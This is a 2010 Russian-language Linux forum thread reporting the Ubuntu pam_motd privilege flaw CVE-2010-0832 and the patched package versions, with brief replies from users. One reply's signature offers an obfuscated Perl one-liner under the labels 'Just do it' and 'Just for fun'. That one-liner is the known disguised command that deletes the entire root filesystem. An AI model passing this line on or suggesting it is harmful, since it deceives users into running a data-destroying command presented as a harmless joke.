В Ubuntu Linux найдена и исправлена критическая уязвимость

Новости портала gomel.linux.by и главные новости мира GNU/Linux, FOSS и Free Software

В Ubuntu Linux найдена и исправлена критическая уязвимость

Сообщение kos32 » 09 июл 2010 18:11

Ошибка в компоненте PAM (pam_motd), выводящем приветствие после логина в систему через консоль, приводила к возможности любому пользователю системы (в том числе и удаленному) получить права на произвольный файл в системе (стать его владельцем). Уязвимость (CVE-2010-0832) актуальна для установок по умолчанию (!) Ubuntu Linux версий 9.10 и 10.04, другие Linux-дистрибутивы ей не подвержены.

источник рус
источник eng

Обновляем pam_motd до версии pam_1.1.1-2ubuntu5 (для lucid) /1.1.0-2ubuntu1.1 (для keramic).
Аватара пользователя
kos32

 
Сообщения: 36
Зарегистрирован: 12 мар 2010 21:33

Re: В Ubuntu Linux найдена и исправлена критическая уязвимос

Сообщение tensor » 10 июл 2010 07:24

У блин, жестокая штука для админов. Слава Богу, что пофиксили, а то очень суровая дырка. Люди пишут, что даже по SSH работает.
Изображение
Just do it perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Just for fun :)
Ось должна быть в кайф!
Аватара пользователя
tensor

 
Сообщения: 208
Зарегистрирован: 10 янв 2010 16:07
Откуда: Gomel

Re: В Ubuntu Linux найдена и исправлена критическая уязвимос

Сообщение Zendar » 10 июл 2010 13:10

любому пользователю системы (в том числе и удаленному)

Жесть :-) Теперь в споре с убунтоидами можно говорить, что бубунта дырявая, как ведро ^^
Аватара пользователя
Zendar

 
Сообщения: 276
Зарегистрирован: 10 янв 2010 15:05
Откуда: Гомель


Вернуться в Новости

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 0

cron